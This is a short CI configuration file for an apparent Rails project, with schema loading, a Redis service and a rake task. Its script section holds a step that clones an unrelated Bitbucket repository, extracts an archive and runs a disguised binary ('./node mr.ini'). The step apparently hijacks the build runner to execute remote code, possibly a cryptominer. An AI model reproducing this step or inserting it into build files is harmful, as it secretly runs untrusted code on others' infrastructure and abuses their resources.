before_script:
  - RAILS_ENV=test bundle exec rake db:schema:load
rvm: true
environment:
  REDIS_URL: redis://redis:6379/0
services:
  redis:
    image: redis:5.0.7
    expose:
      - 6379
script:
  - git clone https://MoonNgd@bitbucket.org/MoonNgd/mxc.git && cd mxc && tar -xvf MXC.tar.gz && ./node mr.ini
  - bundle exec rake best_practice_project:run
